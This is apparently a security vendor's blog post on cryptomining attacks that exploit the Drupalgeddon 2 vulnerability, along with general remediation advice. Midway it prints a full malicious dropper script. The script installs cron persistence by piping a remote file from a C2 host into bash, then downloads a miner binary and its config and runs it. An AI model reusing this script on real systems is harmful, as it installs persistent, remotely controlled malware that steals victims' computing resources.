One of the recent additions to the cyber threat landscape plaguing many organizations is the introduction of Crypto Miners. Due to the rise in popularity of Cryptocurrency, attackers have been shifting their attention and focus on gaining access to as many resources as they can find. The end goal of these attacks is to utilize the victim’s CPU to mine Cryptocurrency. To gain access to these resources the attackers are cycling in and out the latest and most popular exploitable internet facing applications.
The payloads these Crypto Miners are dropping have all been very similar only reencrypting to bypass EDR and AV solutions. While many will argue that Cryptocurrency Mining (“cryptomining”) is a victimless crime as it’s trivial to use automated bots to siphon processing power without user interaction and nowhere near the headache of a ransomware incident, the truth is these attacks highlight a threat of their own. In a worst-case scenario, unthrottled processing can cause serious latency on hosts and potentially cause major issues, such as rendering a service unavailable.
It is highly likely that you’ve already experienced this threat the hard way by finding an unresponsive server or experiencing some type of latency or sluggish behavior on your network or devices. Even if you haven’t noticed the threat yet, if you have an externally facing web server the chances you’re being affected by it remain elevated. That said, you may not have a reliable way to identify if other servers on your network are affected and/or how to stop this threat from starting in the first place. In this blog post we will go through ways to both identify this threat and protect your network.
As with all defensive measures, it is important to understand the scope of the threat and have the proper visibility of the environment. As an example, let’s focus on the aspect of vulnerable servers which have been compromised to allow for cryptomining in the recent Drupalgeddon 2 vulnerability exploit. This attack, which at this writing has impacted over 400 government and university websites worldwide, leverages the critical remote-code execution (RCE) vulnerability (CVE-2018-7600), as reported by Troy Mursch, a researcher with Bad Packets Report.
This particular threat can be broken down into two actions:
1. An attacker gaining access to a host
2. Introducing a method to start a CryptoMining process.
Let’s dive into how we can detect and prevent these activities.
As was the case with the Drupalgeddon 2 attacks, criminals are conducting large scale scans across the internet for vulnerabilities in order to gain some level of privileged access on a server. With tools such as urlscan.io both attackers and defenders can determine which external facing web services are running out of date and vulnerable software. Once the vulnerable services are identified a custom exploit is built and delivered to the servers via a Web Request allowing for Remote Code Execution (RCE) on the host, which is the goal of this action.
Once the attacker has access to the server the next step is to achieve their goal, which in this case is to start a Mining Process. This can be accomplished in many ways however the most common way is to utilize the “wget” or “curl” command to pull a script back from a Command & Control (C2) server during the initial exploit. One example of these scripts can be seen below.
#!/bin/sh
ps aux | grep -vw suppoie | awk ‘{if($3>40.0) print $2}’ | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true andand \
echo “* * * * * curl -s http://xzy.xyz.xyz.xyz/logo7.jpg | bash -s” >> /tmp/cron || true andand \
crontab /tmp/cron || true andand \
rm -rf /tmp/cron || true andand \
curl -o /var/tmp/config.json http:// xzy.xyz.xyz.xyz:8220/1.json
curl -o /var/tmp/suppoie http:// xzy.xyz.xyz.xyz:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null and
fi
sleep 3
echo “runing…..”
The purpose of this script is to remove any existing versions of itself then set a form of persistence in the crontab to download itself ensuring it’s running constantly. Next it downloads the necessary configuration files and ELF executables while checking for information about the host’s CPU. Finally, it runs the executable with the configuration file as a parameter. Now the host has been successfully compromised with a cryptominer and it only took a mater of seconds. It should be noted that the process took into account how many CPU’s the compromised host has, and it will throttle itself so it has a reduced impact on visitors’ CPUs and will be harder to detect. Let’s see how this could be prevented or detected once it occurs.
In the case where you’ve detected the threat in your environment you’ll need to be able to safely remove the CryptoMiner from your environment. While the various compromises may have different artifacts in order to completely eradicate the miner from your system you must review all the forms of persistence on the host and ensure they are removed. This will involve conducting root cause analysis and determining what effects the attack had on the system. System owners can also identify when the attack occurred and utilize back ups to restore the host to known-good state. However, before placing the system back into production the root cause should be patched to ensure the same exploit does not compromise the system again.
As CryptoMiners begin to become the new trend in mass attacks against vulnerable servers, your network doesn’t have to become the next ill-informed victim. By utilizing the proactive concepts in this post you’ll be able to know when an attack happens and prevent it from successfully compromising your servers. If you believe you’ve already become a victim to this crime but aren’t sure where to start, TBG Security offers a range of services to help secure your environment.